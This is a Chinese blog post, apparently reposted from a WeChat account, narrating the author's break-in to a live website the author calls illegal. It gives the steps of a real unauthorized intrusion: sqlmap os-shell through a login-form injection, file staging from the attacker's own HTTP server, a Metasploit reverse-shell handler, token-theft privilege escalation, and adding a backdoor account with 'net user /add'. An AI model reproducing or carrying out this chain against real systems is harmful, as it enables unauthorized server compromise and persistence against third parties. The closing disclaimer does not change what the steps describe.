一 前言
这段时间一直在捣鼓sql注入和msf联合getshell,拿到网站服务器。
1.1收集信息
因为主要想练习sql注入,所以信息收集做的比较简单:
通过sqlmap获取shell权限利用msf获取反弹shell并getshell成功
通过fofa找到相关cms
发现后台登录页面有post sql注入
1.2利用sqlmap一把梭并获取os-shell
二.利用python搭建一个简单的http服务器
python -m SimpleHTTPServer
1.1在这里要给他的服务器写入一个目录
md C:test
1.用自己的服务器上文件上传到被攻击服务器上
三 然后我们在msf上操作1.1 :输入 use exploit/mulit/hander1.2 : 输入 set lhost 接收反弹shell的ip1.2 :输入 run 一把嗦
四.成功进入该服务器
这时发现我们只有gust权限 难受
五.开启艰难的提权之路1.1利用方法内核提权窃取管理tokens 提权
弟弟目前只知道着两种
本文只利用tokens 提权方式
使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌
——————————————————————————————————————————————————————————————————
提权成功
六.创建用户
命令:net user 用户名 密码 /add
淦
思索许久……发现忘了把自己加入管理员用户组了 !!!!!
搞定
本文始发于微信公众号(疯猫网络):非法网站从sqlmap到msf提权远程连接成功
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论